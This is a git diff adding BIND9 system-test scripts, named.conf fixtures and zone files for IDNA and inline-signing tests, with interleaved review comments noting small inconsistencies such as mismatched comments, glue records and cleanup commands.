+ idna_fail "$text" "+noidnin +idnout" "xn--ahahah" + idna_fail "$text" "+idnin +noidnout" "xn--ahahah" + idna_fail "$text" "+idnin +idnout" "xn--ahahah" + + # Too long a label. The punycode string is too long (at 64 characters). + # BIND rejects such labels: with +idnin + + label="xn--xflod18hstflod18hstflod18hstflod18hstflod18hstflod18-1iejjjj" + text="Checking punycode label longer than maximum valid length" + idna_fail "$text" "" "$label" + idna_fail "$text" "+noidnin +noidnout" "$label" + idna_fail "$text" "+noidnin +idnout" "$label" + idna_fail "$text" "+idnin +noidnout" "$label" + idna_fail "$text" "+idnin +idnout" "$label" + + + + + # Tests of a valid unicode string but an invalid U-label (input) + # + # Symbols are not valid IDNA2008 names. Check whether dig rejects them + # when they are supplied on the command line to ensure no IDNA2003 + # fallbacks are in place. + # + # +noidnin: "dig" should send unicode octets to the server and display the + # returned qname in the same form. + # +idnin: "dig" should generate an error. + # + # The +[no]idnout options should not have any effect on the test. + + text="Checking invalid input U-label" + idna_test "$text" "" "√.com" "\226\136\154.com." + idna_test "$text" "+noidnin +noidnout" "√.com" "\226\136\154.com." + idna_test "$text" "+noidnin +idnout" "√.com" "\226\136\154.com." + idna_test "$text" "+idnin +noidnout" "√.com" "xn--19g.com." + idna_test "$text" "+idnin +idnout" "√.com" "√.com." + + # Tests of a valid unicode string but an invalid U-label (output) + # + # Symbols are not valid IDNA2008 names. Check whether dig rejects them + # when they are received in DNS responses to ensure no IDNA2003 fallbacks + # are in place. + # + # Note that "+idnin +noidnout" is not tested because libidn2 2.2.0+ parses + # Punycode more strictly than older versions and thus dig fails with that + # combination of options with libidn2 2.2.0+ but succeeds with older + # versions. 
+ # + # +noidnout: "dig" should send the ACE string to the server and display the + # returned qname. + # +idnout: "dig" should generate an error. + # + # The +[no]idnin options should not have any effect on the test. + + text="Checking invalid output U-label" + idna_test "$text" "" "xn--19g" "xn--19g." + idna_test "$text" "+noidnin +noidnout" "xn--19g" "xn--19g." + idna_test "$text" "+noidnin +idnout" "xn--19g" "√." + idna_test "$text" "+idnin +idnout" "xn--19g" "√." +} + + +# Function to perform tests if IDNA is not enabled. + +idna_disabled_test() { + echo_i "IDNA is disabled, only case mapping tests will be performed" + ascii_case_preservation_test +} + + +# Main test begins here + +$FEATURETEST --with-idn +if [ $? -eq 0 ]; then + idna_enabled_test +else + idna_disabled_test +fi + +exit $status diff --git a/bin/tests/system/ifconfig.bat b/bin/tests/system/ifconfig.bat new file mode 100644 index 0000000..9520abc --- /dev/null +++ b/bin/tests/system/ifconfig.bat 
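Review bot: The comments above the "Checking invalid input U-label" and "Checking invalid output U-label" groups in `idna_enabled_test` say dig should generate an error with +idnin (respectively +idnout), yet every row in both groups is an `idna_test` that expects success; the `+idnin +noidnout` input row, for instance, expects `xn--19g.com.`. As written the suite pins acceptance of a symbol label, the opposite of the "no IDNA2003 fallbacks" intent the comments state, so a reader cannot tell which behaviour is meant to be guarded. Either change the rows that should be rejected to `idna_fail`, or rewrite the two comment blocks to say that these labels are accepted and why. Which of the two is right depends on dig and libidn2 behaviour that is not visible in this hunk.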
@@ -0,0 +1,49 @@
+echo off
+rem
+rem Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+rem
+rem SPDX-License-Identifier: MPL-2.0
+rem
+rem This Source Code Form is subject to the terms of the Mozilla Public
+rem License, v. 2.0. If a copy of the MPL was not distributed with this
+rem file, you can obtain one at https://mozilla.org/MPL/2.0/.
+rem
+rem See the COPYRIGHT file distributed with this work for additional
+rem information regarding copyright ownership.
+
+rem ifconfig.bat
+rem Set up interface aliases for bind9 system tests.
+rem
+rem IPv4: 10.53.0.{1..10} RFC 1918
+rem 10.53.1.{1..2}
+rem 10.53.2.{1..2}
+rem IPv6: fd92:7065:b8e:ffff::{1..10} ULA
+rem fd92:7065:b8e:99ff::{1..2}
+rem fd92:7065:b8e:ff::{1..2}
+rem
+echo Please adapt this script to your system
+rem remove the following line when the script is ready
+exit /b 1
+
+rem for IPv4 adding these static addresses to a physical interface
+rem will switch it from DHCP to static flushing DHCP setup.
+rem So it is highly recommended to install the loopback pseudo-interface
+rem and add IPv4 addresses to it.
+
+rem for IPv6 your interface can have a different name, e.g.,
+rem "Local Area Connection". Please update this script and remove the
+rem exit line
+
+echo on
+
+FOR %%I IN (1,2,3,4,5,6,7,8,9,10) DO (
+ netsh interface ipv4 add address name=Loopback 10.53.0.%%I 255.255.255.0
+ netsh interface ipv6 add address interface=Loopback fd92:7065:b8e:ffff::%%I/64
+)
+FOR %%I IN (1,2) DO (
+ netsh interface ipv4 add address name=Loopback 10.53.1.%%I 255.255.255.0
+ netsh interface ipv4 add address name=Loopback 10.53.2.%%I 255.255.255.0
+
+ netsh interface ipv6 add address interface=Loopback fd92:7065:b8e:99ff::%%I/64
+ netsh interface ipv6 add address interface=Loopback fd92:7065:b8e:ff::%%I/64
+)
diff --git a/bin/tests/system/ifconfig.bat b/bin/tests/system/ifconfig.sh
new file mode 100755
index 0000000..8824c25
--- /dev/null
+++ b/bin/tests/system/ifconfig.sh
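Review bot: The first `FOR` loop and the header comment cover 10.53.0.{1..10} and fd92:7065:b8e:ffff::{1..10}, while ifconfig.sh in this same commit documents {1..11} and sets `max=11`. If any system test binds to 10.53.0.11 (not visible here), it would fail on Windows with an address-not-available error that gives no hint about this script. Suggest `FOR %%I IN (1,2,3,4,5,6,7,8,9,10,11) DO (` and updating the two `{1..10}` ranges in the `rem` header to `{1..11}`.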
@@ -0,0 +1,271 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Set up interface aliases for bind9 system tests. +# +# IPv4: 10.53.0.{1..11} RFC 1918 +# 10.53.1.{1..2} +# 10.53.2.{1..2} +# IPv6: fd92:7065:b8e:ffff::{1..11} ULA +# fd92:7065:b8e:99ff::{1..2} +# fd92:7065:b8e:ff::{1..2} +# +# We also set the MTU on the 1500 bytes to match the default MTU on physical +# interfaces, so we can properly test the cases with packets bigger than +# interface MTU. + +SYSTEMTESTTOP="$(cd -P -- "$(dirname -- "$0")" && pwd -P)" +. "$SYSTEMTESTTOP/conf.sh" + +export SYSTEMTESTTOP + +sys=$($SHELL "$TOP/config.guess") + +use_ip= +case "$sys" in + *-*-linux*) + if type ip > /dev/null; then + use_ip=yes + elif type ifconfig > /dev/null; then + : + else + echo "$0: can't find ip or ifconfig" >&2 + exit 1 + fi + ;; +esac + +up() { + case "$sys" in + *-pc-solaris2.5.1) + [ "$a" ] && ifconfig lo0:$int $a netmask 0xffffffff up + ;; + *-sun-solaris2.[6-7]) + [ "$a" ] && ifconfig lo0:$int $a netmask 0xffffffff up + ;; + *-*-solaris2.[8-9]|*-*-solaris2.10) + [ "$a" ] && { + /sbin/ifconfig lo0:$int plumb + /sbin/ifconfig lo0:$int $a up + /sbin/ifconfig lo0:$int mtu 1500 + } + [ "$aaaa" ] && { + /sbin/ifconfig lo0:$int inet6 plumb + /sbin/ifconfig lo0:$int inet6 $aaaa up + } + ;; + *-*-solaris2.1[1-9]) + [ "$a" ] && { + /sbin/ipadm create-addr -t -T static \ + -a $a lo0/bind9v4$int || + echo failed lo0/bind9v4$int + } + [ "$aaaa" ] && { + /sbin/ipadm create-addr -t -T static \ + -a $aaaa lo0/bind9v6$int || + echo failed lo0/bind9v6$int + } + ;; + *-*-linux*) + if [ "$use_ip" ]; then + ip address add $a/24 
dev lo:$int + ip link set dev lo:$int mtu 1500 + [ "$aaaa" ] && ip address add $aaaa/64 dev lo + else + ifconfig lo:$int $a up netmask 255.255.255.0 mtu 1500 + [ "$aaaa" ] && ifconfig lo inet6 add $aaaa/64 + fi + ;; + *-unknown-freebsd*) + [ "$a" ] && ifconfig lo0 $a alias netmask 0xffffffff mtu 1500 + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa alias + ;; + *-unknown-dragonfly*|*-unknown-netbsd*|*-unknown-openbsd*) + [ "$a" ] && ifconfig lo0 $a alias netmask 255.255.255.0 mtu 1500 + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa alias + ;; + *-*-bsdi[3-5].*) + [ "$a" ] && ifconfig lo0 add $a netmask 255.255.255.0 + ;; + *-dec-osf[4-5].*) + [ "$a" ] && ifconfig lo0 alias $a + ;; + *-sgi-irix6.*) + [ "$a" ] && ifconfig lo0 alias $a + ;; + *-*-sysv5uw7*|*-*-sysv*UnixWare*|*-*-sysv*OpenUNIX*) + [ "$a" ] && ifconfig lo0 $a alias netmask 0xffffffff + ;; + *-ibm-aix4.*|*-ibm-aix5.*) + [ "$a" ] && ifconfig lo0 alias $a + [ "$aaaa" ] && ifconfig lo0 inet6 alias -dad $aaaa/64 + ;; + hpux) + [ "$a" ] && ifconfig lo0:$int $a netmask 255.255.255.0 up + [ "$aaaa" ] && ifconfig lo0:$int inet6 $aaaa up + ;; + *-sco3.2v*) + [ "$a" ] && ifconfig lo0 alias $a + ;; + *-darwin*) + [ "$a" ] && ifconfig lo0 alias $a + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa alias + ;; + *-cygwin*) + echo "Please run ifconfig.bat as Administrator." + exit 1 + ;; + *) + echo "Don't know how to set up interface. Giving up." 
+ exit 1 + ;; + esac +} + +down() { + case "$sys" in + *-pc-solaris2.5.1) + [ "$a" ] && ifconfig lo0:$int 0.0.0.0 down + ;; + *-sun-solaris2.[6-7]) + [ "$a" ] && ifconfig lo0:$int $a down + ;; + *-*-solaris2.[8-9]|*-*-solaris2.10) + [ "$a" ] && { + ifconfig lo0:$int $a down + ifconfig lo0:$int $a unplumb + } + [ "$aaaa" ] && { + ifconfig lo0:$int inet6 down + ifconfig lo0:$int inet6 unplumb + } + ;; + *-*-solaris2.1[1-9]) + [ "$a" ] && { + ipadm delete-addr lo0/bind9v4$int || + echo failed lo0/bind9v4$int + } + [ "$aaaa" ] && { + ipadm delete-addr lo0/bind9v6$int || + echo failed lo0/bind9v6$int + } + ;; + + *-*-linux*) + if [ "$use_ip" ]; then + [ "$a" ] && ip address del $a/24 dev lo:$int + [ "$aaaa" ] && ip address del $aaaa/64 dev lo + else + [ "$a" ] && ifconfig lo:$int $a down + [ "$aaaa" ] && ifconfig lo inet6 del $aaaa/64 + fi + ;; + *-unknown-freebsd*) + [ "$a" ] && ifconfig lo0 $a delete + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa delete + ;; + *-unknown-netbsd*) + [ "$a" ] && ifconfig lo0 $a delete + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa delete + ;; + *-unknown-openbsd*) + [ "$a" ] && ifconfig lo0 $a delete + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa delete + ;; + *-*-bsdi[3-5].*) + [ "$a" ] && ifconfig lo0 remove $a + ;; + *-dec-osf[4-5].*) + [ "$a" ] && ifconfig lo0 -alias $a + ;; + *-sgi-irix6.*) + [ "$a" ] && ifconfig lo0 -alias $a + ;; + *-*-sysv5uw7*|*-*-sysv*UnixWare*|*-*-sysv*OpenUNIX*) + [ "$a" ] && ifconfig lo0 -alias $a + ;; + *-ibm-aix4.*|*-ibm-aix5.*) + [ "$a" ] && ifconfig lo0 delete $a + [ "$aaaa" ] && ifconfig lo0 delete inet6 $aaaa/64 + ;; + hpux) + [ "$a" ] && ifconfig lo0:$int 0.0.0.0 + [ "$aaaa" ] && ifconfig lo0:$int inet6 :: + ;; + *-sco3.2v*) + [ "$a" ] && ifconfig lo0 -alias $a + ;; + *darwin*) + [ "$a" ] && ifconfig lo0 -alias $a + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa delete + ;; + *-cygwin*) + echo "Please run ifconfig.bat as Administrator." + exit 1 + ;; + *) + echo "Don't know how to destroy interface. Giving up." 
+ exit 1 + ;; + esac +} + +sequence() ( + awk -v s=$1 -v e=$2 ' + BEGIN { + for (i = s ; i <= e; i++) { print i; } + exit; + }' +) + +# +# 'max', 'i' and 'ns' are used to compute the interface identifier for +# systems that need it and must be unique for each interface (e.g. lo:$int). +# +# int=$((i * max + ns)) +# +# 'max' is the number of nameservers configured in the inner loop. +# 'i' is the outer loop counter. +# 'ns' in the namserver being configured. +# 'int' interface identifier. +# +max=11 +case $1 in + start|up|stop|down) + for i in $(sequence 0 2) + do + case $i in + 0) ipv6="ff" ;; + 1) ipv6="99" ;; + 2) ipv6="00" ;; + *) ipv6="" ;; + esac + for ns in $(sequence 1 $max) + do + [ $i -gt 0 -a $ns -gt 2 ] && break + int=$((i * max + ns)) + a=10.53.$i.$ns + aaaa=fd92:7065:b8e:${ipv6}ff::$ns + case "$1" in + start|up) up;; + stop|down) down;; + esac + done + done + ;; + *) + echo "Usage: $0 { up | down }" + exit 1 + ;; +esac diff --git a/bin/tests/system/inline/clean.sh b/bin/tests/system/inline/clean.sh new file mode 100644 index 0000000..79f3774 --- /dev/null +++ b/bin/tests/system/inline/clean.sh 
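Review bot: `down()` has no case for `*-unknown-dragonfly*`, although `up()` handles it together with NetBSD and OpenBSD, so on DragonFly `ifconfig.sh down` would fall through to "Don't know how to destroy interface. Giving up." and leave the aliases configured. The FreeBSD, NetBSD and OpenBSD branches of `down()` are identical and could be merged as `*-unknown-freebsd*|*-unknown-dragonfly*|*-unknown-netbsd*|*-unknown-openbsd*)`; that `delete` is the right verb on DragonFly is assumed. The usage text `{ up | down }` also omits the accepted `start` and `stop` arguments.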
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -rf ./*/*.jbk \
+ ./*/*.nzd ./*/*.nzd-lock ./*/*.nzf \
+ ./*/named.conf ./*/named.memstats ./*/named.run* ./*/named.lock \
+ ./*/trusted.conf \
+ ./K* ./*/K* \
+ ./checkecdsa \
+ ./freeze.test* thaw.test* \
+ ./import.key \
+ ././ns*/managed-keys.bind* ./ns*/*.mkeys* \
+ ./*/dsset-* ./*/nzf-* \
+ ./*/*.db ./*/*.db.signed ./*/*.db.jnl ./*/*.db.signed.jnl \
+ ./*.out ./*.out* ./*/*.out ./*/*.out* \
+ ./*/*.bk ./*/*.bk.jnl ./*/*.bk.signed ./*/*.bk.signed.jnl \
+ ns3/a-file ns3/removedkeys
diff --git a/bin/tests/system/inline/ns1/named.conf.in b/bin/tests/system/inline/ns1/named.conf.in
new file mode 100644
index 0000000..da27c58
--- /dev/null
+++ b/bin/tests/system/inline/ns1/named.conf.in
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
+
+include "trusted.conf";
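Review bot: In inline/clean.sh, `rm -rf` is applied to broad globs such as `./K*`, `./*.out*` and `./*/*.db`, so any directory whose name happens to match is removed recursively. Everything in the list looks like a regular file, and idna/clean.sh in this commit uses `rm -f` for the same job, so `rm -f ./*/*.jbk \` on the first line would be the safer form. Two entries also look like slips: `thaw.test*` lacks the `./` prefix the others carry and `././ns*/managed-keys.bind*` has it twice; both still resolve correctly.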
diff --git a/bin/tests/system/inline/ns1/root.db.in b/bin/tests/system/inline/ns1/root.db.in
new file mode 100644
index 0000000..915d95b
--- /dev/null
+++ b/bin/tests/system/inline/ns1/root.db.in
@@ -0,0 +1,59 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+bits. NS ns3.bits.
+bits. NS ns4.bits.
+ns3.bits. A 10.53.0.3
+ns4.bits. A 10.53.0.4
+
+noixfr. NS ns3.noixfr.
+ns3.noixfr. A 10.53.0.3
+
+master. NS ns3.master.
+ns3.master. A 10.53.0.3
+
+dynamic. NS ns3.dynamic.
+ns3.dynamic. A 10.53.0.3
+
+updated. NS ns3.updated.
+ns3.updated. A 10.53.0.3
+
+expired. NS ns3.expired.
+ns3.expired. A 10.53.0.3
+
+retransfer. NS ns3.retransfer.
+ns3.retransfer. A 10.53.0.3
+
+nsec3. NS ns3.nsec3.
+ns3.nsec3. A 10.53.0.3
+
+externalkey. NS ns3.externalkey.
+ns3.externalkey. A 10.53.0.3
+
+retransfer3. NS ns3.retransfer.
+ns3.retransfer3. A 10.53.0.3
+
+inactiveksk. NS ns3.inactiveksk.
+ns3.inactiveksk. A 10.53.0.3
+
+inactivezsk. NS ns3.inactivezsk.
+ns3.inactivezsk. A 10.53.0.3
diff --git a/bin/tests/system/inline/ns1/sign.sh b/bin/tests/system/inline/ns1/sign.sh
new file mode 100644
index 0000000..5e024c2
--- /dev/null
+++ b/bin/tests/system/inline/ns1/sign.sh
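Review bot: The `retransfer3.` delegation names `ns3.retransfer.` as its server, but the glue written directly below it is for `ns3.retransfer3.`, so the delegation and its glue do not match. Every other delegation in this file pairs `NS ns3.<zone>.` with `ns3.<zone>. A`, which suggests a copy-paste slip. Resolution still works only because `ns3.retransfer.` has its own A record two stanzas earlier. If the mismatch is not deliberate, `retransfer3. NS ns3.retransfer3.` would make the stanza self-contained; if it is, a one-line comment saying so would help.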
@@ -0,0 +1,26 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=.
+rm -f K.+*+*.key
+rm -f K.+*+*.private
+keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone)
+$SIGNER -S -x -T 1200 -o ${zone} root.db > signer.out
+[ $? = 0 ] || cat signer.out
+
+keyfile_to_static_ds $keyname > trusted.conf
+cp trusted.conf ../ns6/trusted.conf
diff --git a/bin/tests/system/inline/ns2/bits.db.in b/bin/tests/system/inline/ns2/bits.db.in
new file mode 100644
index 0000000..2652047
--- /dev/null
+++ b/bin/tests/system/inline/ns2/bits.db.in
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns2 . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns3
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
diff --git a/bin/tests/system/inline/ns2/named.conf.in b/bin/tests/system/inline/ns2/named.conf.in
new file mode 100644
index 0000000..3ad6d96
--- /dev/null
+++ b/bin/tests/system/inline/ns2/named.conf.in
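Review bot: The `[ $? = 0 ] || cat signer.out` check after the `$SIGNER` call in ns1/sign.sh does not do what it appears to. If the script is started through its `#!/bin/sh -e` shebang, a failing signer aborts the script before the check runs and the contents of signer.out are never shown. If it is instead run as `sh sign.sh`, `-e` is not in effect, the log is printed, and the script still goes on to write trusted.conf from a zone that was not signed. Handling the failure on the command itself covers both cases: `$SIGNER -S -x -T 1200 -o ${zone} root.db > signer.out || { cat signer.out; exit 1; }`. The first `keyname=` assignment is overwritten on the next line, so a comment such as `# only the KSK name is used for trusted.conf` would make that intent explicit.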
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ notify-delay 0;
+ allow-new-zones yes;
+};
+
+zone "bits" {
+ type primary;
+ file "bits.db";
+ allow-update { any; };
+};
+
+zone "retransfer" {
+ type primary;
+ file "retransfer.db";
+ allow-update { any; };
+ notify no;
+};
+
+zone "retransfer3" {
+ type primary;
+ file "retransfer3.db";
+ allow-update { any; };
+ allow-transfer { none; }; // changed dynamically by tests.sh
+ notify no;
+};
+
+zone "nsec3-loop" {
+ type primary;
+ file "nsec3-loop.db";
+ notify no;
+};
+
+zone "inactiveksk" {
+ type primary;
+ file "inactiveksk.db";
+ allow-update { any; };
+};
+
+zone "inactivezsk" {
+ type primary;
+ file "inactivezsk.db";
+ allow-update { any; };
+};
+
+zone "nokeys" {
+ type primary;
+ file "nokeys.db";
+ allow-update { any; };
+};
+
+zone "removedkeys-secondary" {
+ type primary;
+ file "removedkeys-secondary.db";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/inline/ns2/nsec3-loop.db.in b/bin/tests/system/inline/ns2/nsec3-loop.db.in
new file mode 100644
index 0000000..d12af8d
--- /dev/null
+++ b/bin/tests/system/inline/ns2/nsec3-loop.db.in
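Review bot: Nothing in ns2/named.conf.in says that its open ACLs are deliberate: the `controls` statement accepts rndc from `allow { any; }` and most zones set `allow-update { any; }`. Access is therefore limited only by the 10.53.0.2 listen address and the key included from `../../common/rndc.key`, which is presumably a fixed key checked into the tree. A comment above `controls` would keep the fixture from being reused as a template, for example `// test-only: open ACLs are acceptable because this instance binds only to 10.53.0.2 and uses the shared test rndc key`. The same `allow { any; }` control channel appears in the ns3, ns5 (.pre and .post), ns6, ns7 and ns8 configurations in this commit, and `allow-update { any; }` recurs in ns3 and ns4.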
@@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; NOTE: This zone's data has been crafted in order to reproduce a very specific +; scenario (see ns7/named.conf for more details). Please do not modify this +; file. + +$TTL 300 ; 5 minutes +@ IN SOA ns2 . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 diff --git a/bin/tests/system/inline/ns3/include.db.in b/bin/tests/system/inline/ns3/include.db.in new file mode 100644 index 0000000..c46a6a8 --- /dev/null +++ b/bin/tests/system/inline/ns3/include.db.in @@ -0,0 +1,12 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +f A 10.0.0.7 diff --git a/bin/tests/system/inline/ns3/master.db.in b/bin/tests/system/inline/ns3/master.db.in new file mode 100644 index 0000000..4d30cf6 --- /dev/null +++ b/bin/tests/system/inline/ns3/master.db.in 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/inline/ns3/master2.db.in b/bin/tests/system/inline/ns3/master2.db.in new file mode 100644 index 0000000..24a0666 --- /dev/null +++ b/bin/tests/system/inline/ns3/master2.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042408 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +e A 10.0.0.5 diff --git a/bin/tests/system/inline/ns3/master3.db.in b/bin/tests/system/inline/ns3/master3.db.in new file mode 100644 index 0000000..f3062c3 --- /dev/null +++ b/bin/tests/system/inline/ns3/master3.db.in 
@@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042409 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 diff --git a/bin/tests/system/inline/ns3/master4.db.in b/bin/tests/system/inline/ns3/master4.db.in new file mode 100644 index 0000000..737e2e2 --- /dev/null +++ b/bin/tests/system/inline/ns3/master4.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 hostmaster. ( + 2000042410 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 diff --git a/bin/tests/system/inline/ns3/master5.db.in b/bin/tests/system/inline/ns3/master5.db.in new file mode 100644 index 0000000..a1e1300 --- /dev/null +++ b/bin/tests/system/inline/ns3/master5.db.in 
